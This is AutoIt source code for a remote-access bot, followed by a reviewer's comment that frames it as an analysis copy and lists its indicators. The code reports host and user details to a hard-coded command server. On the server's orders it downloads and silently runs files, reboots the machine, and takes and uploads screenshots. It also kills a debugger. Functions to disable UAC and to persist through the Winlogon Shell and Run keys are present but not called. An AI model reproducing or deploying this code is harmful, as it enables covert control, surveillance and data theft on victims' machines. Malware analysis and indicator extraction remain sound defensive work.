1 | #NoTrayIcon | |
2 | ;#RequireAdmin | |
3 | #include <File.au3> | |
4 | #include <Misc.au3> | |
5 | #include <string.au3> | |
6 | #include <crypt.au3> | |
7 | #include <ScreenCapture.au3> | |
8 | ||
9 | ;Mutex | |
10 | ;------ | |
11 | ||
12 | ;Singleton("7563545689855477") | |
13 | ||
14 | ;HWID | |
15 | ;------ | |
16 | ||
17 | Global $hwid = id() | |
18 | ||
19 | ;disable uac | |
20 | ;------ | |
21 | ||
22 | if IsAdmin() Then | |
23 | ;_Disable_UAC() | |
24 | EndIf | |
25 | ||
26 | ;SETTING VARIABLES | |
27 | ;------ | |
28 | $mainHome = "http://jlibs8080.no-ip.biz" ;main domain | |
29 | $mainDir = "/bnt2/" | |
30 | $upshot = $mainHome & $mainDir & "u.php" ;path to upload file | |
31 | $serverHome = $mainHome & $mainDir & "s.php" ;path to server file | |
32 | $cmdDir = $mainHome & $mainDir & "dir.php" ;path to commandDir file | |
33 | ||
34 | ;------above = url[/]------below = local path[\]------ | |
35 | $subDir = "\n0625d6982e9krf824\" | |
36 | $filei = "\jhgr78.log" ;update log - make random VIA builder | |
37 | ||
38 | ;------ | |
39 | $interv = 5 | |
40 | $counter = $interv * 1000 * 60 ;15 minutes | |
41 | ;------ | |
42 | ||
43 | $timeInit = TimerInit() | |
44 | Global $result | |
45 | Global $ip = @IPAddress1 | |
46 | ;Do On Start Up | |
47 | ;------ | |
48 | ||
49 | ;FileMove(@ScriptFullPath, @TempDir & $subDir & "hvn.exe", 9) | |
50 | ||
51 | if(FileExists(@TempDir & $subDir) <> 1) Then | |
52 | DirCreate(@TempDir & $subDir) | |
53 | EndIf | |
54 | ||
55 | ;$reg = RegWrite('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', @ScriptName, 'REG_SZ', @TempDir & $subDir & 'hvn.exe') | |
56 | ;_Run(@ScriptFullPath) | |
57 | ||
58 | ;Anti Debugger | |
59 | ;------ | |
60 | ||
61 | $process = "OLLYDBG.EXE" | |
62 | ||
63 | If ProcessExists($process) Then | |
64 | ProcessClose($process) | |
65 | EndIf | |
66 | ||
67 | ;Initial update | |
68 | ;------ | |
69 | ||
70 | _Update($filei) | |
71 | ||
72 | ;UPDATE | |
73 | ;------ | |
74 | While 1 | |
75 | While 1 | |
76 | ||
77 | $updateTime = TimerDiff($timeInit) | |
78 | ||
79 | if $updateTime > $counter Then | |
80 | ;ConsoleWrite("test") | |
81 | ;$command = InetRead($cmdDir,1) | |
82 | $Command = _Update($filei) | |
83 | ||
84 | if $command == "-1" Or StringLeft($command,3) == "<br" Then | |
85 | ||
86 | $interv = Random(5,30,1) | |
87 | $counter = $interv * 1000 * 60 | |
88 | $timeInit = TimerInit() | |
89 | ExitLoop | |
90 | ||
91 | EndIf | |
92 | ||
93 | $process = BinaryToString($command) | |
94 | $comS = StringSplit($process,"|") | |
95 | $uComs = UBound($comS) - 1 | |
96 | Global $commandVal[$uComs+1][10] | |
97 | ||
98 | for $j = 1 to $uComs | |
99 | ||
100 | $cMas = StringSplit($comS[$j],",") | |
101 | $uCmas = UBound($cMas) - 1 | |
102 | ||
103 | for $l = 1 to $uCmas | |
104 | ||
105 | $commandVal[$j][$l] = $cMas[$l] | |
106 | ||
107 | Next | |
108 | Next | |
109 | ||
110 | $uCommandVal = UBound($commandVal)-1 | |
111 | ||
112 | for $j = 1 to $uCommandVal | |
113 | ||
114 | Switch $commandval[$j][1] | |
115 | ||
116 | Case 1 | |
117 | ||
118 | _DlnEx($commandval[$j][2],$commandval[$j][3],1,1,$commandval[$j][4]) ;DL n EX | |
119 | ||
120 | Case 2 | |
121 | ||
122 | _DlnEx($commandval[$j][2],$commandval[$j][3],1) ;DL | |
123 | ||
124 | Case 3 | |
125 | ||
126 | _DlnEx("",$commandval[$j][3],0,1,$commandval[$j][4]) | |
127 | ||
128 | Case 4 | |
129 | ||
130 | ;haha($commandval[$j][1]) | |
131 | Shutdown(6) | |
132 | ||
133 | Case 5 | |
134 | ||
135 | $scrnName = Random(12,999999,1) & ".jpg" | |
136 | _ScreenCapture_Capture(@ScriptDir & "\" & $scrnName) | |
137 | ScrnUp($scrnName) | |
138 | FileDelete(@ScriptDir & "\" & "*.jpg") | |
139 | ||
140 | EndSwitch | |
141 | ||
142 | Next | |
143 | ||
144 | ;//////---end of update---////// | |
145 | ;reset time | |
146 | ;------ | |
147 | ||
148 | ;$interv = Random(5,30,1) | |
149 | ;$counter = $interv * 1000 * 60 | |
150 | Sleep(500) | |
151 | $timeInit = TimerInit() | |
152 | EndIf | |
153 | ||
154 | Sleep(50) | |
155 | ||
156 | WEnd | |
157 | WEnd | |
158 | ;//////---Functions---////// | |
159 | ||
160 | ;------ | |
161 | ;HWID | |
162 | ||
163 | func id() | |
164 | $disc = StringLeft(@SystemDir, 3) | |
165 | $start = "0" & @CPUArch & @KBLayout & DriveGetSerial("C:\") & StringUpper(DriveGetType($disc)) & DriveSpaceTotal ($disc) | |
166 | $hwid1 = StringMid($start, Round(StringLen($start)/2), Round(StringLen($start)/2)) | |
167 | $hwid2 = _StringToHex(stringReverse($hwid1)) | |
168 | $final = $start & $hwid2 | |
169 | $start = _Crypt_HashData($Final,$CALG_MD5) | |
170 | $epicFinal = StringMid($start,1,8) & ":" & StringMid($start,8,16) | |
171 | ||
172 | Return StringSplit($epicFinal, ":") | |
173 | EndFunc | |
174 | ||
175 | ;------ | |
176 | ;MUTEX | |
177 | ||
178 | Func Singleton($semaphore) | |
179 | Local $ERROR_ALREADY_EXISTS = 183 | |
180 | DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $semaphore) | |
181 | Local $lastError = DllCall("kernel32.dll", "int", "GetLastError") | |
182 | If $lastError[0] = $ERROR_ALREADY_EXISTS Then Exit -1 | |
183 | EndFunc | |
184 | ||
185 | ;------ | |
186 | ;Disable UAC | |
187 | ||
188 | Func _Disable_UAC() | |
189 | If @OSArch = "X64" Then | |
190 | $pref = "64" | |
191 | Else | |
192 | $pref = "" | |
193 | EndIf | |
194 | $r1 = RegWrite("HKLM" & $pref & "\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" ,"ConsentPromptBehaviorAdmin", "REG_DWORD", "0") | |
195 | $r2 = RegWrite("HKLM" & $pref & "\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" ,"EnableLUA", "REG_DWORD", "0") | |
196 | Sleep(500) | |
197 | If $r1 + $r2 = 2 Then | |
198 | Return True | |
199 | Else | |
200 | Return False | |
201 | EndIf | |
202 | EndFunc | |
203 | ||
204 | ;------ | |
205 | ;StartUp | |
206 | ||
207 | Func _run($file, $type = 1) | |
208 | $ret = False | |
209 | $arun = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell") | |
210 | if StringInStr($arun, @ScriptName) = 0 Then | |
211 | $name = @ScriptName | |
212 | FileCopy($file, @WindowsDir & "\" & $name, 1) | |
213 | $ret = RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", $arun & "," & $name) | |
214 | EndIf | |
215 | Return $ret | |
216 | EndFunc | |
217 | ||
218 | ;------ | |
219 | ;update | |
220 | ||
221 | Func _Update($updateFile) | |
222 | ||
223 | Global $ip = @IPAddress1 | |
224 | $compName = @ComputerName | |
225 | $os = @OSVersion | |
226 | $userName = @UserName | |
227 | $Name = $hWID[1] | |
228 | $password = $hwid[2] | |
229 | ||
230 | $memStats = MemGetStats() | |
231 | ||
232 | _FileWriteLog(@TempDir & $updateFile, "Percent memery usage - " & $memStats[0] & " # ") | |
233 | ||
234 | $infoz = FileOpen(@TempDir & $updateFile) | |
235 | $infozz = FileRead($infoz) | |
236 | ||
237 | $serverdata = '&username=' & $name & '&password=' & $password & '&os=' & $os & '&oigh=' & $infozz & '&ip=' & $ip & '&name=' & $userName & '&compName=' & $compName | |
238 | $oHTTP = ObjCreate("winhttp.winhttprequest.5.1") | |
239 | $oHTTP.Open("POST", $serverHome, False) | |
240 | $oHTTP.SetRequestHeader("Content-Type","application/x-www-form-urlencoded") | |
241 | $oHTTP.Send($serverdata) | |
242 | $oReceived = $oHTTP.ResponseText | |
243 | FileClose($infoz) | |
244 | ||
245 | ConsoleWrite($oReceived & @CRLF) | |
246 | ||
247 | FileDelete(@TempDir & $updateFile) | |
248 | Return $oReceived | |
249 | ;Exit | |
250 | EndFunc | |
251 | ||
252 | ;------ | |
253 | ;DL n EX | |
254 | ||
255 | Func _DlnEx($DlURL="",$DlFileName="",$DwnL = 0,$DlnEx = 0,$exeParams="") | |
256 | ||
257 | $result = "" | |
258 | ||
259 | If $Dwnl == 1 Then | |
260 | $dlget = InetGet($DlURL,@TempDir & $subDir & $DlFileName) | |
261 | InetClose($dlget) | |
262 | ||
263 | If $dlget <> 0 Then | |
264 | $result &= "dl-succ-" & $DlFileName | |
265 | Else | |
266 | $result &= "dl-error-fail-" & $DlFileName | |
267 | EndIf | |
268 | EndIf | |
269 | ||
270 | If $DlnEx == 1 Then | |
271 | ||
272 | ShellExecute($DlFileName,$exeParams,@TempDir & $subDir,"open",@SW_HIDE) | |
273 | Sleep(500) | |
274 | ||
275 | $dlNexPrcExs = ProcessExists($DlFileName) | |
276 | ||
277 | If $dlNexPrcExs <> 0 Then | |
278 | $result &= "-exe-true-" & $DlFileName & "-pid=" & $dlNexPrcExs & "-" | |
279 | Else | |
280 | $result &= "-exe-FAIL-To-Start-" & $DlFileName | |
281 | EndIf | |
282 | ||
283 | EndIf | |
284 | ||
285 | _FileWriteLog(@TempDir & $filei, $result) | |
286 | ||
287 | EndFunc | |
288 | ||
289 | ;------ | |
290 | ;upload scrnshot | |
291 | ||
292 | Func ScrnUp($scrnFile) | |
293 | ||
294 | Local $picOpen = FileOpen(@ScriptDir & "\" & $scrnFile,16) | |
295 | Local $picRead = FileRead($picOpen) | |
296 | Local $boundary = "a65h7a" & @CRLF | |
297 | Local $boundary2 = "--" & $boundary | |
298 | Local $binary = "Content-Transfer-Encoding: binary" & @CRLF | |
299 | local $typeCon = "Content-Type: txt/html" & @CRLF & @CRLF | |
300 | ||
301 | Local $postData = $boundary2 | |
302 | ||
303 | $postData &= 'Content-Disposition: form-data; name="file[]"; filename="' & $hwid[2] & '"' & @CRLF | |
304 | $postData &= $typeCon | |
305 | $postData &= $picRead & @CRLF | |
306 | $postData &= "--a65h7a--";End of HTTP HEADER | |
307 | ||
308 | $oHTTP = ObjCreate("winhttp.winhttprequest.5.1") | |
309 | $oHTTP.Open("POST", $upshot, False) | |
310 | $oHTTP.SetRequestHeader("Content-Type", "multipart/form-data; boundary=" & $boundary) | |
311 | $oHTTP.Send($postData) | |
312 | $oReceived = $oHTTP.ResponseText | |
313 | ||
314 | FileClose($picOpen) | |
315 | ||
316 | EndFunc | |
317 | ;------ | |
318 | ;debug Purpuses | |
319 | func haha($var) | |
320 | ||
321 | ConsoleWrite("haha it worked" & @CRLF) | |
322 | ConsoleWrite($var & @CRLF) | |
323 | ||
324 | EndFunc |
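Review bot: The listing carries no header saying what it is. The top-level loop with `_Update`, `_DlnEx` and `ScrnUp` is an HTTP bot that posts host details to a hard-coded server and acts on the pipe/comma-delimited reply (download, run, reboot, screenshot upload), so it should open with a label such as `; Sample: AutoIt HTTP bot (check-in, download-and-run, screenshot upload) - analysis copy`. That header should also gather the indicators now scattered through the code so they can be searched for: host `jlibs8080.no-ip.biz` with `/bnt2/s.php`, `/bnt2/u.php` and `/bnt2/dir.php`, the temp-directory sub-folder `n0625d6982e9krf824`, the log file `jhgr78.log`, the multipart boundary `a65h7a`, and the POST fields `username`, `password`, `os`, `oigh`, `ip`, `name`, `compName` sent through `winhttp.winhttprequest.5.1` over plain HTTP. The comment on the `$counter` line says 15 minutes, but `$interv = 5` gives a five-minute check-in that is re-drawn from 5 to 30 minutes after a `-1` or `<br` reply, so it should read `;5 minutes, re-randomised to 5-30 after a failed reply`. The calls to `_Disable_UAC()` and `_Run()` and the `CurrentVersion\Run` write are commented out in this revision; the header should say so and name the keys they touch (`Policies\System` values `EnableLUA` and `ConsentPromptBehaviorAdmin`, and the Winlogon `Shell` value) as places to check on a host where a built variant is suspected.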